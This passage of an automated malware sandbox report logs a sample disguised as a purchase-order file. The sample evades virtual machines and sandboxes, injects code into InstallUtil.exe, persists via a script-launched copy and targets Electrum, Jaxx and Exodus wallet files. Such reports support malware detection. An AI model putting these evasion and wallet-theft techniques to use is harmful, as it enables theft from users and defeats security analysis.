                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: PO-12202432_ACD_Group.pif.exe PID: 4992, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: IsNestedFamANDAssem.exe PID: 1788, type: MEMORYSTR
                  Queries memory information (via WMI often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                  Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory allocated: E50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory allocated: 2920000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory allocated: 4920000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1140000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4F20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory allocated: 1340000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory allocated: 3150000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 24C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 26C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 24E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeWindow / User API: threadDelayed 9935Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 9947Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeWindow / User API: threadDelayed 9882Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1316Thread sleep count: 9935 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908Thread sleep time: -99875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908Thread sleep time: -99766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908Thread sleep time: -99641s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908Thread sleep time: -99516s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908Thread sleep time: -99406s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908Thread sleep time: -99297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908Thread sleep time: -99188s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908Thread sleep time: -99063s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908Thread sleep time: -98938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908Thread sleep time: -98828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1908Thread sleep time: -98719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5584Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4452Thread sleep count: 9947 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 3600Thread sleep count: 9882 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096Thread sleep time: -99891s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096Thread sleep time: -99766s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096Thread sleep time: -99656s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096Thread sleep time: -99547s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096Thread sleep time: -99437s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096Thread sleep time: -99328s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 4808Thread sleep count: 67 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096Thread sleep time: -99219s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096Thread sleep time: -99109s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096Thread sleep time: -99000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096Thread sleep time: -98891s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 7096Thread sleep time: -98781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99875Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99766Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99641Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99516Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99406Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99297Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99188Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99063Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98938Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98828Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99891Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99766Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99656Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99547Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99437Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99328Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99219Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99109Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98891Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69483700366.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                  Source: IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69504846703.0000000006310000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: HgfS5paYPq
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69504846703.0000000006310000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: GD7YGf2sqemUAekHdy6
                  Source: InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69696765541.00000000010CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 590000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7738A6F0Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 460000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 462000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C74008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7738A6F0Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 590000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 592000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5F0000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5F2000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 373008Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.000000000335E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000003314000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000003386000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.000000000335E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000003314000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000003386000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager*
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.000000000329C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerh{
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.000000000335E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000003314000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000003386000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeQueries volume information: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeQueries volume information: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                  Source: InstallUtil.exe, 00000002.00000002.71833522803.0000000005A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB)
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
